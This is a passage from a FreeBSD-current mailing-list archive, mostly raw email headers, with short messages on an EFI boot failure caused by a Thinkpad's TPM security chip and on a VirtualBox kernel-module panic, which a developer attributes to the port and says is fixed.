20:ku6qFSg6tVM5/4aKW2TRFjpqIuzBkHaHw76WmHg0TK8YrQUNftPHjL4onozEFClIoJSGk5HFcs1NaoTD8S7llcX4nSrHpWLrneBY57g9S15WXsastViGXIAWJPbBIkK904tEhBfTfe4Tjfwuhaha214yGLY02uybWCn2YDcakZzq377Tq7dh3IxSFzYz1LXhf06M89dJuCAf2KF3PrzGF1UfmLVJiVY5mMDQvQxCBrzoJhGxFznRBV0falKvo2As2AlzF969pt5t7um5BAE329rwwuVFriTgXKolxbesHgc6P6i8/TdGQSPNXMqc8+f5i+lNImHvFg0EazSOmT/QUCmbX4zXxLX6WgA5KIwTa+P7VHZBm0R6q2Rlmupi+oYvLnCqxz7nNljVDKe5Gtv58MaCUwNHddouenvO/kIsdNwekLsCEFdgqm3oYLfLMTtTXAehpqvvbfo+Lurp2B10u0bmzM3onJBR4KZ94QuoJep5Hy1ZlYSr2T+weuSzXXLt X-Microsoft-Antispam-PRVS: X-Exchange-Antispam-Report-Test: UriScan:(192374486261705)(112903893386949); X-Exchange-Antispam-Report-CFA-Test: BCL:0; PCL:0; RULEID:(601004)(2401047)(5005006)(8121501046)(3002001)(10201501046); SRVR:CY1PR0501MB1323; BCL:0; PCL:0; RULEID:; SRVR:CY1PR0501MB1323; X-Microsoft-Exchange-Diagnostics: 1; CY1PR0501MB1323; 4:s/7KF5Cs5+53KfE6m4GZfR1riw2a+UBuBdJwotfgrdwal52AeA6iOmzbppHSRxkDiLqOm6RkyKu4KFWGqM22sVixf5gtkHw2uplk+HBlMv9+k0IC6yIh6H47CUBPLowvGsVuSqUgd2R67aUOuPE4ln3nXdbMYPgB/S9/u2xhnElrZ37Gm6N6KZllD7DEmUbn4T5HH2468FcbTo/YdCwy/XVB+EEchYyzPubx3J9A2kTeuT8TUeNNCAHb+ev9JkMF3UDnTvZKrGR2n2G3HwXt3o1Ein/C6wY2fKXKqOb9ufuC+86vwt2dPSwvJddSH+9cvnPr2iGi6+IleuvrCtYfSZatC+XQ1SClCr+ESkjaBhJJJFRiyDO/1V6P/7265UiTywo2wNz+phP4HPrkovnptyGAmyaKdnVv0jNBatKqTZBove5rqCTYwbpvlyuFSo7X X-Forefront-PRVS: 00159D1518 X-Forefront-Antispam-Report: SFV:NSPM; SFS:(10009020)(4630300001)(6009001)(7916002)(199003)(189002)(377454003)(24454002)(86362001)(101416001)(19580405001)(19580395003)(55446002)(98316002)(93516999)(50466002)(54356999)(76176999)(63696999)(50986999)(42186005)(69596002)(105586002)(2906002)(15650500001)(107886002)(88552002)(122856001)(450100001)(6116002)(3846002)(586003)(9686002)(81166006)(81156014)(8676002)(23676002)(7846002)(7736002)(305945005)(92566002)(97736004)(9896002)(68736007)(5820100001)(110136002)(189998001)(75432002)(90282001)(66066001)(106356001)(59536001)(61266001)(47776003)(2950100001)(61726006)(89122001)(2351001)(55456009); DIR:OUT; SFP:1101; SCL:1; SRVR:CY1PR0501MB1323; H:mail-qt0-f181.google.com; FPR:; SPF:None; PTR:InfoNoRecords; A:1; MX:1; LANG:en; Received-SPF: None (protection.outlook.com: ksu.edu does not designate permitted sender hosts) X-Microsoft-Exchange-Diagnostics: =?utf-8?B?MTtDWTFQUjA1MDFNQjEzMjM7MjM6dEp0UUIxSUpmMlFnbnRETndlTmc0dlB2?= =?utf-8?B?dm1Nd21iYmVUMmszMkppdUs2dzFRd2dSOHE4VzdjU1ptY2FUR1p0YVhJWWlB?= =?utf-8?B?OGkxQklTOWRvSk1RajNMTkRFM2JhYTNmeUw2aU5hZmtodmYyb2RpN2hteGJE?= =?utf-8?B?YVlmUlZ1RkRVdGlTMXhqckl4SFUrZXBMNmhOMjkydVo4ZmV2aXhQdzl3OVc1?= =?utf-8?B?M0hQZHpnTzFJTHphM1A0dXdSTXI4MDZrdklDdFJsRDJrOHdBKzRUQzNvVVRY?= =?utf-8?B?SjRqTWNyd2phUzA0aWtXajlET1JVTWRqUnJuZWp3aVBQS2txNlZhRDlIQjdq?= =?utf-8?B?cVIyZ2NDL0U1TkhkbU5ERnNUOGhhcXNZZy9xSXVWSlZkUzdIMXZmY2JrSm9D?= =?utf-8?B?OFhjczdzanBJVmFkVk5QV25xQXd2eVVqVzBzaUEwRGpaTktCci9CNytiSElE?= =?utf-8?B?NDF3ZlhTVnBZenhZOHdNdGRKOWxmVUhJM2JReFZwT21XUjZMdXpJb2NJcjg5?= =?utf-8?B?VVRSMHpjLzVRZ24xd01MaFFRR1UreFp0amhGSjBBUCtpQ3BVN0ZLV2s0RHJO?= =?utf-8?B?d0NKSmZGN2J1UjRRR2JSb0JsMnNaNFZ1bGQ4RG53d0ZxUHFqR3NpV2FGclFp?= =?utf-8?B?Z2tQbVJiQ2t2VGFRK3hxOUVzZ3NCazczUk1hK1hDcXZnTHVmTkthaDFKRWl2?= =?utf-8?B?MUt6UW90dnhWTDJZMklyTVVoR1B2akhTbks0Wi9lMCsxdHN0Y1ZvOFZqNGU3?= =?utf-8?B?R3hTcW9uTVJiMUFibWZsUzJtSVQraDlQR3ViT05FWUNwWis2WDh3Myt1Ykhh?= =?utf-8?B?S2lIVWhsNTZZRXVmd3FTNzBRWE1wYnpDYnhURE84VHBiNE5GTjFVTENVRklz?= =?utf-8?B?MmNpd2tScklhUnRPMjhXVjZCLzdmYzlySUNKeWRscWcxKzRYYVVvRE9qYmRG?= =?utf-8?B?U3cxaHZ6WXNuTFJHWFJoWm8za2w2ZHVUZFYxMlBhY1VyWUV3eU1OQUZ0UHNv?= =?utf-8?B?RHJGR01IaEg2VytSc3JzNHI3b05Zb2NrR0V5OW5PSGN0RWE0azhsdmlveGhR?= =?utf-8?B?SkljZ0h0VWhsWXlSRXVxRys4VHNGU1ZWQnp1TVkzV2F1blF6b3RrOGdpYWhS?= =?utf-8?B?M0p4ZnRLTXZ4c0lJcWF4VEhiM1IwaXRJTG1sZk1qU0xhazRvakRUS1MzWEFH?= =?utf-8?B?T01RcXBqSFRtajY5Y1hLemg1Q0gxeUlUZERTTFh5OG9IOCtEWStKOVU4WVVv?= =?utf-8?B?RmxGL2ZhMjE3VEVwNmNWS3RXMkZ1bDNURWsvNkQ5cXdQcW5JRXkzN0F0Nk92?= =?utf-8?B?VjliOVRiV2lyT1YyWUhWZlB2WFVSU01TWDRNOFpMSDdBSGRuYi9Kall3ZkV5?= =?utf-8?B?WDFKRHVDTTNsWlBKSE9PcG5zU1JvSGNZK3kvbFl4SVNac1l0ckdFVGZKamNs?= =?utf-8?B?TXJEVTI2TzYzV21XQkRVemlzZUlXbnN1VjA1YzR6Qzc0ZDFFdEdQREtVN1FJ?= =?utf-8?B?RTJBeTVBRlZzYXUyREJTcjg5bWp4RnVFR1BuS2pwUFErbGNvQWp1ZXZYcXlI?= =?utf-8?B?UytPWHo0alNKSHljd1RYM24yRlN4U2libDFrUGdwZVY0S1MrWHpuQko1RnZa?= =?utf-8?B?RWhTcy9pejhJL1NBeGFlMVdxUVFyNWtMeTNPZFNkYmw1OWhGSmhtQXh0V1Rs?= =?utf-8?B?WFRpSFcrQXpCanl1QU9iZDE0bVBDMVNYM29BTVRxb2NBbHA5dzRaZUUxeFVi?= =?utf-8?B?ZzZLNHRyYSttY09CSU1wVmEyMjBibXdQNVplYUJHejcyRVRBenk2VkdYd2d0?= =?utf-8?B?UUsyc0VGdmRhU2gxaDlNNXdqY2FZMTdFSmM2WHZ2MDNxbFdtV0tUQng4dGRN?= =?utf-8?B?VzI0bVRCS0Jvcm1vZzMrc1NhODNENXRaUXY3WUJHT2k4Q2VkRENpVG9XQ1R4?= =?utf-8?B?WHNKSzlqckZNa2c9PQ==?= X-Microsoft-Exchange-Diagnostics: 1; CY1PR0501MB1323; 6:dt+1gEpgmpb0dP6cCHstaJ2KU8IcOAjXHdP0Ia8W4JqcgZDWH2lRao3BXpng/RWJb6eX0t6aTXyO1y67z2M+XE4jmuLdlgC6znAMZc13gW/X18L7JOUxCBBFredBm7RekbrTx3BGLzPHTeuKS2y1Cu71q8YA0wIid0BdtKJx4ksOpLt/inIv7B879B0S3B7YpMlpJUgMw6Q5V4C+IdOCNJ3dG5a9yu1GC7p4Nf7brbEm651C3V5QVXefSqYNViBtnym5se1mw3SIwBz8GTPxxVIkYCKYLHVZYHyDbjqqzU4=; 5:lNsDB6qUpJip0TwzOD3kEAkgRvUgKZTkVDW1sQWUg6k7UqMxzRewm581h9FrGkJQOacaZvz5kwuUAButMY6TWDYCDnlt3Dz15NtH52GpM1D6YPljaWsZ4rmPPaQC5Kd+GgP7NJv3t9xQuTh6GsD0+Q==; 24:EIWwoUPZTOulqBRgn8V+HED+ZHvrelatTDoePz9BqJT+KQrKhEVDjSZ9c1D7MwnugLAetVxC2xMZXpIv+VZXZRT3G9MDgvSY5LD0FKvViRQ=; 7:e2MwofK1U+xxjU0npXHkihni11fbjt1lSpG1IPPSJkhR/9SAGK430VkWQ+y3wIGfiPKLMqa8LqZg+WVPcEvQEgho1Aoosequ34vpV/puBUtpWz6seLsN6O6uVrm0Cl6g+CBjkJqKILQlpACRRcVfHmPcFjYUzM0KYHvHx0GojTpu8rY9jAQbpT1+UVfvabrjdXzdI7Ggctx4QknqL5Tv2V8hiAULpUyh4a6PmxZr7LGJInVpGTUX5IPO8A+ZmxTm SpamDiagnosticOutput: 1:99 SpamDiagnosticMetadata: NSPM X-Microsoft-Exchange-Diagnostics: 1; CY1PR0501MB1323; 20:tV2+rBHihkQKjbcgOKKQ+vBV7AJZ8FTtabFV0FQRbU24ZGrMWzhNAzH4WtP7hsWFOxXp2YLr46LfMeV6r7aX9l4826Gb8qNIvRjAccmjLqgvcF0EAPD7324jAPbkg7KgIFWddNAuS6d7oSWdB+POu7IF+tK2Zi0+3IaMXoSEA10= X-OriginatorOrg: ksu.edu X-MS-Exchange-CrossTenant-OriginalArrivalTime: 26 Jul 2016 23:16:02.9297 (UTC) X-MS-Exchange-CrossTenant-FromEntityHeader: Hosted X-MS-Exchange-Transport-CrossTenantHeadersStamped: CY1PR0501MB1323 X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 26 Jul 2016 23:16:07 -0000 On Fri, Mar 18, 2016 at 3:54 PM, Kyle Evans wrote: > Hello! > > I recently purchased an older Thinkpad Yoga 11e and now I've installed > 10.3RC2 to it. It appears that the Security Chip feature causes > problems in attempting to boot 10.3RC2 (and a slightly older -CURRENT, > as well, but re-tested with 10.3RC2 just for the sake of > verification). The following output is written when attempting to boot > from the `amd64-uefi-memstick.img`: > > == > >>> FreeBSD EFI boot block > Loader path: /boot/loader.efi > LoadImage failed with error 2 > HandleProtocol failed with error 2 > StartImage failed with error 2 > panic: Load failed > > == > > Rebooting and disabling the security chip fixes this, and everything > runs along nicely. Re-enabling the Security Chip after 10.3RC2 is > installed and attempting a boot yields the slightly different (while > slightly expected, given the above, but I'm adding this anyways): > > == > >>> FreeBSD EFI boot block > Loader Path: /boot/loader.efi > > Initializing modules: ZFS UFS > Probing 4 block devices. . . . . .* done > ZFS found the following pools: zroot > UFS found no partitions > Failed to load image provided by ZFS, size: 2033504512, (2) > panic: No bootable partitions found! > > == > > Is this expected behavior? I was under the impression that the > "Security Chip" was largely unrelated to anything in the boot process. Hi, This might be unlikely, but what are the odds that devpath_last (sys/boot/efi/boot1/boot1.c:135) isn't quite returning the correct device path to be passed to bs->LoadImage() (sys/boot/efi/boot1/boot1.c:405) in the case that a TPM chip is present? This would seem to line up with the EFI_INVALID_PARAMETER error that LoadImage is returning -- especially given that the ZFS bits here are correctly enumerating my device's pool. Thanks, Kyle Evans From owner-freebsd-current@freebsd.org Wed Jul 27 01:19:07 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id CB593BA3F3F for ; Wed, 27 Jul 2016 01:19:07 +0000 (UTC) (envelope-from jkim@niksun.com) Received: from APC01-SG2-obe.outbound.protection.outlook.com (mail-sg2apc01on0090.outbound.protection.outlook.com [104.47.125.90]) (using TLSv1.2 with cipher ECDHE-RSA-AES256-SHA384 (256/256 bits)) (Client CN "mail.protection.outlook.com", Issuer "Microsoft IT SSL SHA2" (verified OK)) by mx1.freebsd.org (Postfix) with ESMTPS id 2C65D1F5F for ; Wed, 27 Jul 2016 01:19:06 +0000 (UTC) (envelope-from jkim@niksun.com) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=niksunipl.onmicrosoft.com; s=selector1-niksun-com; h=From:Date:Subject:Message-ID:Content-Type:MIME-Version; bh=YAgP0EORWteRNtKSM5SRkM0MMbs97M+IuF/LkEjFupA=; b=hNzvIDiD5yySpggaQz76GrC35LJsNDvWL9GlApoaYJupBFWApH7p3WqNGQrNIZLhy12/UFRVdsPAfxEoi4yI6uiSU2kdLczq3nylJYfkMrJS0fCMwrwHlt77jb7T3t/uMXcFqD5j+DT5D2FHpCMkTDBEWRd3KlR7ePqI2r1uroo= Authentication-Results: spf=none (sender IP is ) smtp.mailfrom=jkim@niksun.com; Received: from hammer.pct.niksun.com (24.104.71.38) by SG2PR0301MB2015.apcprd03.prod.outlook.com (10.167.80.13) with Microsoft SMTP Server (version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P384) id 15.1.544.10; Mon, 25 Jul 2016 23:43:42 +0000 Subject: Re: Panic when loading vboxdrv module To: Randy Westlund , References: <20160725191314.GA10757@gmail.com> <92c7634b-8f19-eccd-75a0-68e5fd98e597@FreeBSD.org> From: Jung-uk Kim Organization: NIKSUN, Inc. Message-ID: <7875d0e7-6cbd-6184-3f34-a2fbd00788b1@niksun.com> Date: Mon, 25 Jul 2016 19:43:32 -0400 User-Agent: Mozilla/5.0 (X11; FreeBSD amd64; rv:45.0) Gecko/20100101 Thunderbird/45.2.0 MIME-Version: 1.0 In-Reply-To: <92c7634b-8f19-eccd-75a0-68e5fd98e597@FreeBSD.org> Content-Type: text/plain; charset="windows-1252" Content-Transfer-Encoding: 7bit X-Originating-IP: [24.104.71.38] X-ClientProxiedBy: CY1PR15CA0022.namprd15.prod.outlook.com (10.163.14.32) To SG2PR0301MB2015.apcprd03.prod.outlook.com (10.167.80.13) X-MS-Office365-Filtering-Correlation-Id: 2988695e-04cc-4304-ce6a-08d3b4e5833b X-Microsoft-Exchange-Diagnostics: 1; SG2PR0301MB2015; 2:N1pIfMlE/yLTVpNF4vmfJ12gCXOFQ8LZ0fxIgbxJdBkhujVqh/30XwwMfu73v1DVsXTVCX6YdQ+5YpWKYSgE06hhLRcC3AHyadesLlve4qK4Crmbp2Y3Tck5sTesw8gox5O2o9OhVrUsnkbDtWcsK/0QirC5S8TnyE6QInVmGHgbqXxXuBAiFJp1prrCC1Wr; 3:OEK1C0TrWMoo53DQHq7dKBgrarJ/PpnM2tx493bIqccfTbPr71cZSB+rinar0SdxiFoH2qeY+oOPRJzt80NG/QiGbWGbHvfdiCXoOBc/kMxpCAgiXbny0ttCRlLwWzyC X-Microsoft-Antispam: UriScan:;BCL:0;PCL:0;RULEID:;SRVR:SG2PR0301MB2015; X-Microsoft-Exchange-Diagnostics: 1; SG2PR0301MB2015; 25:r9jAJcObPlGlQwpld6bzlk1IKbWUkYfmvesM3dN3BKFkU8Fib/fu3eZdZknyY15STkzEGy0dm3aXebsrVYNWP0mmNriF1bNO8eNdfbWTOJjNdaS49HfvMNfk0bFtelg8B2PfVqRjBxEbmjWQUlZ/xdPABvvAiwNMnSaJRRQVuDY+BoGULub2DCzvfwC2bZ236yxdB5gUYIeUmCH98KhlA4CQDq1F039/Fn4Pf8rjVSEePtLT8MjLHmy92cPI6M3OG9IhVyZ34OrkwsoUT4EBrLR0ntHTGZBmt0T6H54kzp3GlMP4CgZKo46cT7j9piZnWFEN8aWW6CeQYS7xpzCCyat48fqzAEoua2dt0JeiEHUV1BcWR2DB5cjEvaUBQIlw1AMDzvBavAILchRqSFX9bIX0gERG9wMIfAY3TluRs6DKWcirxhEMmtcln51MF3Y83GmQrtnyu4HmRhpgULzRZA1v+l5+/u8vaD+wYs3l5Fpfkh39h9hahxr8uk4nwn6J4vufwbLleFgOOA0kvOz3+FOFU2PZtfYOC//ZECxd6hOzMNenB9aKf+QdCbGeNh3pDaKEhVDPG8juJXacC1jZvAUzgf6a+KiHtwaMLpFUXdwSVWQyIL2kCK7c6uT6Gd2qwatc2qj6n0mYWJq7ZEklKaDtMsJEWvgM/vPM15acxTJZKvtFXerkD1NRXjtyLj1AbfVdjYItC6Q1WCgsiRudaA==; 31:LKc8N9TGDs8dLDxeohc9GwyAhdpioB7Ti53YHgVBP5e4FzDbDhtmGR8RRyuRuQQkMACN5W3HIdaAtGQKUkMbp9zXd8/0gLjExQix5048wj8cz9qiLkoDwYtruLhDDeceGhcjDZKJd5r8EXJ+/+PmAJwcFD2ZgfePwkBCc5sMpwlXhPGpMussy2SC3dpjfAgqOsjnv0ojxIIas1PByWxqLg== X-Microsoft-Exchange-Diagnostics: 1; SG2PR0301MB2015; 20:VjAB/E4cV3Bf/OPjo9ZHAqhyVMTVZzz2k/wDJtuaHHfFjPkzMcD09eWkuV2U/11P1yzgMcvzwFuAOUwkAf0dhqr5rf1IrJtf2fkonlfFolEim2bf7j2zp1scndUWjytbJwYbY0Jv4AXWUK1Mp3/bvUjtASduServuIVrvXdd400fSud0CFpRaIGX2NuPxDLmcjl4tFKULit+fqPdOlKu3C6aeO2Ejdel36I3coRk8j9PiWSi/7mftKZu/n1mqKMjZRUwErC/O97HEgTLtqM9EsAuv6VAkpyQeUWT9gJBfTk91QcNiAiknNf5FOou7/2JeRg7wQ7X1ZMPiwy5tEyooVV0Da9bbjh+wfUmJfelOY/hQw11G9abg1JXzpcg4Nt1VUTog34nZxi4GF9s+x1ani/eQ3sCknp48wvfVh05oNvOum8wLjQHBrY5ZkVmP7uPxEfCT9qQBVouYZXovn1TRwUWeQZOMdRgfUCfdAklVndvo0F4SuuzY7VIfZsuWaK8; 4:MANoAgScCjyJXuS4ChCGWhff4nbLucnfDv6SYm9fwGEVmhcaiyZKpaPlgN9LLCnR0jRXd1IfE8oCG/Gj+qui8SWdQwxr9tdd7/WUIWrjBxTTaSK0ZeAfrnu6PsNonitDvqujD7rwO6btVGrHJ0B1SyZtqakU7kg4tBKUcc3pvjWrzAdVzrheBdR4IOzuW42HDihllH8BwemopIAmGtlN+bke3DriB3kxQSMb7ylcXtWH/qPwFbUcjQTbsfzvDHqTPO/esfXvut9z1TdmSetlgq5S4aESiTrJHU/QARTb3Wum8eC3qIoSCv4Xz5ZHh4aYwrvNv4rRKbdwJGDLGB0YhYVAvK6cDJpJ4eulZ3qnruVdmsw5yEUJHz8QbvHKsKQVLPFqk1FHyKCc4bBtn0WJx2OQj4LULaXZdvGo1aovhk8= X-Microsoft-Antispam-PRVS: X-Exchange-Antispam-Report-Test: UriScan:; X-Exchange-Antispam-Report-CFA-Test: BCL:0; PCL:0; RULEID:(6040130)(601004)(2401047)(8121501046)(5005006)(3002001)(10201501046)(6041072)(6043046); SRVR:SG2PR0301MB2015; BCL:0; PCL:0; RULEID:; SRVR:SG2PR0301MB2015; X-Forefront-PRVS: 0014E2CF50 X-Forefront-Antispam-Report: SFV:NSPM; SFS:(10019020)(4630300001)(6009001)(7916002)(189002)(52314003)(24454002)(377454003)(199003)(50986999)(54356999)(305945005)(19580395003)(2906002)(76176999)(230700001)(65806001)(65956001)(66066001)(68736007)(101416001)(107886002)(97736004)(4001350100001)(5001770100001)(81156014)(81166006)(106356001)(31686004)(83506001)(64126003)(92566002)(3846002)(8676002)(2950100001)(50466002)(6116002)(31696002)(586003)(189998001)(105586002)(42186005)(575784001)(86362001)(7846002)(7736002)(23746002)(77096005)(36756003)(33646002)(47776003)(65826006); DIR:OUT; SFP:1102; SCL:1; SRVR:SG2PR0301MB2015; H:hammer.pct.niksun.com; FPR:; SPF:None; PTR:InfoNoRecords; MX:1; A:1; LANG:en; Received-SPF: None (protection.outlook.com: niksun.com does not designate permitted sender hosts) X-Microsoft-Exchange-Diagnostics: =?Windows-1252?Q?1; SG2PR0301MB2015; 23:+yiToujs0LvuYfKgf/k8iBDBVKKfe8HLab/?= =?Windows-1252?Q?Z3GAR6PNlRXCecMLzkXj+RtJ+tsM9gJGdwWEa5FErtQo1B4XvzzVmdgw?= =?Windows-1252?Q?/RFlQGOISt3A6OdSuzgxhciLiucVK2GftJ2fmCGjiGtJGz3t09GMu9E1?= =?Windows-1252?Q?B6wJszLdKh3jtcCIdK9Y16QDLZVGpRZoKpfzGjxjczMXtKnNgqtDAXSL?= =?Windows-1252?Q?JXxuuWRc34w+dL+fKCAJ5Ttfx1R/D6eMudkecoNP35UMdW1CZdsM4OLC?= =?Windows-1252?Q?QaO8KYMdN7VyqK6pRCXlHrP9ANmYL+TzaTK0tmQ6+3uZjZtFc4zWS8o2?= =?Windows-1252?Q?K5JFkSaAVopoocR7ciP4g+KuIQE1riku9AROCk2l+Ii1DBxHDW8LfLK0?= =?Windows-1252?Q?XLOUDmeL1/oeR96EyFw1If5puK9AmTt21DjMgNujC0wwc7301RmhNKc5?= =?Windows-1252?Q?9cXrT1Us1YcEhvaw5K79YSSYFWjGmXE3s6BU2y6p+zYxyPwv7A2LKb6q?= =?Windows-1252?Q?3jOPv4YIv+KllhtbxY3BLHqOn39L/PtXRyhmAHZaaqwJr/o3zbw/dohT?= =?Windows-1252?Q?h6sdL5XM9apVqxcB7Roil40N9Y0g6A+yc/NzHGIhftlvAP+6hKxEKQT6?= =?Windows-1252?Q?xnC4l9t8d3X08w07dRZZC/UgoALlib0bpEmU5M+xQrD4qayoZK6d1jzv?= =?Windows-1252?Q?Q12gCrtIQFK7VC7s3D9ZlXXARAKHsngeejMr54OtRAqJK9k7Rg4etP9T?= =?Windows-1252?Q?ItB7VF8BxzGDCjvh2KLEYZFiUPsn/y6dNZulQbcy/cdiTRqR2Su7GBb/?= =?Windows-1252?Q?cl6iFXxKYKkNWmUZs+QAmeGPWOW7dNjzOYGlkK9sMvCeW9mcGl5sD9Oe?= =?Windows-1252?Q?TYpLKbWph6HxI30u16zLPcAbLTB+xkwCEvSfvd/bx/Dv2I9Mit/zEe9E?= =?Windows-1252?Q?CAKqpS3n6L68SVPlltoMlgkBvhJ4FCqA2DLXd8jsfLi498TPaAf48W7B?= =?Windows-1252?Q?a2hYX1zua4BbltzdY9kRz8fonaPNUQ97RVVXYNj1al0nskcSR2QXmiYE?= =?Windows-1252?Q?lOvm1onpug7/1QG8WWp5uUCD08y9E+90RwIGv+yZ89eRyz/EQ0JQ7oEg?= =?Windows-1252?Q?qDrYocmXBbb2gBKdWfq8w6BrZv3xGom6TpsmpnL4lI6EZ4PW2jlLCbeP?= =?Windows-1252?Q?Svqrn4GuKmsMZeytZktOadAM41RhoHOvXzKxBXBLwpfeFznZ2ptzvDJq?= =?Windows-1252?Q?ONaTT8yYioowJm6ACVT0c/5Io4R8z23CywSubw1hd84z1c5xUDHrUtny?= =?Windows-1252?Q?7j6ZaIP8edK0yO0VFTJem6Z4lNLQa5TQM6qWswTfgdHO5LNdFntIaQbV?= =?Windows-1252?Q?0REtwMoXoL9FD?= X-Microsoft-Exchange-Diagnostics: 1; SG2PR0301MB2015; 6:z0LQwQ+nUkUOcmS63s6sBVzbQNCXj8yrgKAtLGeHeFVuUIMgrwlFlZ93I6W6FlVBYQJ+zoVq51OCEiLhRmdPR9c3/9TILcDQhpeJhWhjQtXJsFyJEl6DWkZ622SSu5Do1ekuYa2RB+FNXVWD945YgC44XRQw0EIbKcMme/djz+d1M0mspPRh78vpFIzpDaxXrDmapoT+QX28xpEZY7Dg4ETLDC5u6YZfaOzkc8Rya0TlyHwj0k6GlSquurmbXGk/7LaNzPA022/TPdAaqkLd0poC+HFl6in3tP3fdKiidLND+VkBxEnVP0PuSrpFMf65; 5:asgRN7LJbhWvZaHmOg/P8QRec8eJv/g/K6A1A4iVH3A2kXhNG16ZIqSjGmTaEaNnmbksy/DE/2+2aelNoCqNGS7OCGAE7fNH0PzZnoP866H8s2q1u0UA0iiyHpgB3MJPp/9pA0k5lPKkj89IMQauOw==; 24:JLaWhnRHd0/xCRkvFWuIs4oUYOgMy+Y3wi76ZSqdjXpod8mmUek9Z9j6D/SwQAuLlQiY93/pt2SpfLEYAPGu4v7NextA8lU8q1hW+V+PiVs=; 7:VXs4+EIRxxoDJP4JVFzPHjSbvGuEP06IPI3vkpUkCj+fwgoM5ZY+BYd1ufYl0BPcvVyuiUDwqQbr395ENjjDi4sNu0b2/WOwxm7ZMmYULg7kwyL6KK1OMyI9P+vXp51beF12UaNw2jL/sYLqSVcGFIYGDLQc3Soo/YJdxxDEtVn/WSFHgtijNGvxR0n1CBYRp6M5qmORWoJDVGX8eIzYNy29nszW9gxhJTNdeVBhl9lev2Jht6O2BRgNPOynP2bW SpamDiagnosticOutput: 1:99 SpamDiagnosticMetadata: NSPM X-OriginatorOrg: niksun.com X-MS-Exchange-CrossTenant-OriginalArrivalTime: 25 Jul 2016 23:43:42.1699 (UTC) X-MS-Exchange-CrossTenant-FromEntityHeader: Hosted X-MS-Exchange-Transport-CrossTenantHeadersStamped: SG2PR0301MB2015 X-Mailman-Approved-At: Wed, 27 Jul 2016 02:59:31 +0000 X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 27 Jul 2016 01:19:07 -0000 On 07/25/16 03:27 PM, Jung-uk Kim wrote: > On 07/25/16 03:13 PM, Randy Westlund wrote: >> I'm running 12-CURRENT r303286 and virtualbox-ose-kmod-5.0.26. I just >> rebuilt the module, so I know they're in sync. When I boot with >> vboxdrv_load="YES" in /etc/loader.conf, I get this panic during boot: >> >>> panic: mutex Giant owned at /usr/src/sys/kern/kern_sync.c:406 >>> cpuid = 0 >>> KDB: stack backtrace: >>> db_trace_self_wrapper() at db_trace_self_wrapper+0x2b >>> vpanic() at vpanic+0x182 >>> panic() at panic+0x43 >>> __mtx_assert() at __mtx_assert+0xd1 >>> mi_switch() at mi_switch+0x7b >>> sleepq_switch() at sleepq_switch+0x7e >>> sleepq_timedwait() at sleepq_timedwait+0x43 >>> rtR0SemEventWait() at rtR0SemEventWait+0x267 >>> supdrvGipCreate() at supdrvGipCreate+0x7f6 >>> supdrvInitDexExt() at supdrvInitDexExt+0x18f >>> VBoxDrvFreeBSDModuleEvent() at VBoxDrvFreeBSDModuleEvent+0x49 >>> module_register_init() at module_register_init+0xb0 >>> mi_startup() at mi_startup+0x118 >>> btext() at btext+0x2c >>> KDB: enter: panic >>> [ thread pid 0 tid 100000 ] >>> Stopped at kdb_enter+0x3b: movq $0,kdb_why >> >> I'm not sure whether this is a problem with the base system or the port, >> but this happens every time I boot with the module enabled. > > emulators/virtualbox-ose-kmod is causing the trouble and this problem is > well known. To work around it, remove WITNESS option from kernel > configuration for now. Oops, I meant INVARIANTS. Anyway, it should be fixed in r419083. I understand you have a panic with aio(4) but that's a separate issue. Jung-uk Kim From owner-freebsd-current@freebsd.org Wed Jul 27 03:33:16 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 08733BA6755; Wed, 27 Jul 2016 03:33:16 +0000 (UTC) (envelope-from howard0su@gmail.com) Received: from mail-yw0-x231.google.com (mail-yw0-x231.google.com [IPv6:2607:f8b0:4002:c05::231]) (using TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits)) (Client CN "smtp.gmail.com", Issuer "Google Internet Authority G2" (verified OK)) by mx1.freebsd.org (Postfix) with ESMTPS id B1A2A1366; Wed, 27 Jul 2016 03:33:15 +0000 (UTC) (envelope-from howard0su@gmail.com) Received: by mail-yw0-x231.google.com with SMTP id u134so45919790ywg.3; Tue, 26 Jul 2016 20:33:15 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=mime-version:in-reply-to:references:from:date:message-id:subject:to; bh=2Q8eWl9qXdKTpKwK6rW9Q3zAK+blMxdt5S/Ej+U9iuo=; b=S/7MXbSgi774iBhv522KKBJL5XtEyRgmJC9d9CqdlmmWuO3SJ5jKLjZNMdbgRpm4x7 3mAdYe+2dpGofL5NKO2PBIQPhvIoZt9Y95J69Ua8jzJCiRTCzQqBKEzj1Ld6u69+fhk7 NUrDydv3ZrqoKmiUliO81uEArJR8pfHF63kH5uoiNcoLzQ5yIqdNYrHQ2UZ7wpNqYSIB SWtyB9SOLDN5vGPIKCNC+aDxFLHXLg5aAzo8LDEJh3fdpev2rKjLsRAmcRFBA0CVBbkq py+x++kmKmORLOz13qGXKN52d1nR/NFHAYcI9p3noqT6wigfvrx2YeMcJ0vnSLA25v9W w23Q== X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20130820; h=x-gm-message-state:mime-version:in-reply-to:references:from:date :message-id:subject:to; bh=2Q8eWl9qXdKTpKwK6rW9Q3zAK+blMxdt5S/Ej+U9iuo=; b=R/HQUhAgJUl0cqrWOLmNtsAKeznypO/ewnd9Yiywa9GdUxCHMymkn2to3i2zqsPw+c QzqQmP+Q9Ju3GO+srhaQUHgqS8QwQMS8JAXatit/AgUMP6y3s1bPJEvYoZVDvzvIZkml 